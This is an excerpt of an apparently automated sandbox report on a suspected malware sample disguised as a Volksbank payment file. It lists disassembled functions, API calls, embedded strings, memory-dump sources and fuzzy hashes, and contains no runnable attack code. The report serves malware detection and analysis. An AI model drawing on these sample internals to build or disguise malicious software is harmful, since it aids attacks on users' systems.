                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                                          • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4053608372-0
                                                                                                                                                                                                                                          • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                                                          • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                          • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                          Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                          • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                          • String ID: AE
                                                                                                                                                                                                                                          • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                          • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                          • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                          • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                          • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                          Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                                                          • String ID: AE$"
                                                                                                                                                                                                                                          • API String ID: 568519121-1989281832
                                                                                                                                                                                                                                          • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
